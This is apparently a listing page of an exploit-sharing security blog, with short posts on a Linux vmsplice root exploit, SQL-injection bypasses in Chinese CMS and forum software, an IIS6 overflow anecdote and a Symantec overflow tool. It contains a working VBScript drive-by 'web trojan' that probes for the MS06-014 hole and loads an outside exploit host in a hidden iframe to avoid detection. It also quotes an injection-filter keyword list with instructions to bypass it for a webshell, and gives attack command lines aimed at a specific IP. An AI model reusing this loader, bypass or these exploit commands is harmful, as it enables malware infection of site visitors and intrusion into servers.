exp

Analyzing the Linux Kernel vmsplice Exploit

On February 9, zero-day exploit code [1] was posted on milw0rm site. It exploited
vulnerability in linux kernels Versions 2.6.17 to 2.6.24.1. This bug allows
an unprivileged local user to gain root privileges. This vulnerability was
assigned CVE-2008-0600.
There are reports that this exploit is reliable and actively used in the wild.
The inner workings of this exploit are quite interesting from the
technical point of view; let’s have a look.

» 阅读全文

关键词: 0-day , exp , linux

风讯cms4sp5 商业版存在严重注射漏洞

风讯4的防注射函数NoSqlHack存在致命缺陷,导致入侵者可以轻松得到webshell

Function.asp

  1. Function NoSqlHack(FS_inputStr)   
  2.     Dim f_NoSqlHack_AllStr,f_NoSqlHack_Str,f_NoSqlHack_i,Str_InputStr   
  3.     Str_InputStr=FS_inputStr   
  4.     f_NoSqlHack_AllStr="*|and |exec |or |insert |select |delete |update |count |master |truncate |declare |and    |exec    |insert    |select    |delete    |update    |count    |master    |truncate    |declare    |char(|mid(|chr(|and[|exec[|insert[|select[|delete[|update[|count[|master[|truncate[|declare[|set[|set |set    |where[|where |where    |xp_cmdshell|xp_cmdshell |xp_cmdshell    "  
  5.     f_NoSqlHack_Str = Split(f_NoSqlHack_AllStr,"|")   
  6.   
  7.   
  8.     For f_NoSqlHack_i=LBound(f_NoSqlHack_Str) To Ubound(f_NoSqlHack_Str)   
  9.     If Instr(LCase(Str_InputStr),f_NoSqlHack_Str(f_NoSqlHack_i))<>0 Then   
  10.     If f_NoSqlHack_Str(f_NoSqlHack_i)="'" Then f_NoSqlHack_Str(f_NoSqlHack_i)=" \' "  
  11.     Response.Write "<html><title>??</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>???????????</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>?????????!</li><br><li>??IP:"&Request.ServerVariables("Remote_Addr")"</li><br><li>????:"&Now"</li></font></body></html><!--Powered by Foosun Inc.,AddTime:"&now"-->"  
  12.     Response.End  
  13.     End if  
  14.     Next   
  15.     NoSqlHack = Replace(Str_InputStr,"'","''")   
  16. End Function    

关键字后面跟空格和tab是过滤的,但是跟回车时一样可以执行注射语句.过滤单引号也没有用的,我插入时用16进制编码,所以每一个点都是有问题的注射点

http://www.sebug.net/vulndb/2306

关键词: 风讯 , 0day , exp , 漏洞 , 入侵

saforum 注射漏洞

saforum 注射漏洞

saforum是国内安全研究人员修改过的saforum论坛,但是代码中有一点瑕疵导致可能被获取管理员权限:)
\include\common.php 行41~49引入没有过滤的变量

http://www.sebug.net/vulndb/2237

关键词: 脚本渗透 , exp , 漏洞

SA-Blog v1.6 wap Exp

sablog是国内安全研究人员写的一款blog程序,但是代码中有一点瑕疵导致可能被获取管理员权限:)

问题出在wap/index.php里的652行左右

» 阅读全文

关键词: 0day , 脚本渗透 , exp , sablog , 漏洞

被骗了一次,呼呼,IIS6溢出....

经过一天的折腾,终于是到家了。

累得不行,呵。不过在内蒙也不错,项目都已经搞定了,已经验收了。用户对我们的工作也还算是满意吧。不过也得好好的总结一下,毕竟还是存在着一些问题。下个星期又开始新的生活了。

前几天BOSS传给我一个IIS的溢出。哈哈,当时兴奋了半天,传说中的iis6远程溢出啊,哈哈。丢几个图看看。

ex.jpg

ex.jpg

大小: 36.96 KB
尺寸: 500 x 268
浏览: 853 次
点击打开新窗口浏览全图

iis_01.jpg(缩略图)

iis_01.jpg

大小: 51.6 KB
尺寸: 500 x 146
浏览: 860 次
点击打开新窗口浏览全图

关键词: iis6 , 生活 , exp , 工作 , 技术

智能网马

  1. <script language=VBScript>  
  2. on error resume next  
  3. set    server = document.createElement("object")  
  4. server.setAttribute "classid""clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"  
  5. set File = server.createobject(Adodb.Stream,"")  
  6. if Not Err.Number = 0 then  
  7. err.clear  
  8. 'msgbox "没有0614漏洞,页面转到ms07004exp!" 
  9. document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>") 
  10. else 
  11. 'msgbox "存在0614漏洞,页面转到MS0614的EXP!"  
  12. document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")  
  13. end if  
  14. </script>

这样就优先执行0614,没有没有0614漏洞再执行ms07004,还可以再接着写,如果没有ms07004,就返回空页面算了,减少被发现的机率

来源:7jgd's blog

关键词: 网马 , exp , 代码收藏

2006年EXP集合

收集的2006年的所有EXP源码

感谢好友 小轩 提供

也谢谢所有朋友对本站的支持

http://www.sebug.net/show-exp-920.html

关键词: sebug , exp

Symantec remote management stack buffer overflow

Symantec remote management stack buffer overflow exploits for Win32/x86

扫描2967 2976这两个端口

成功率在30%`40%

正向
s -r ip -p 2976

反向
s -r ip -l 你的ip -d 你的端口

PS:
s -r 61.100.149.160

» 阅读全文

关键词: 0day , exp , 漏洞

Total: 1312Next ›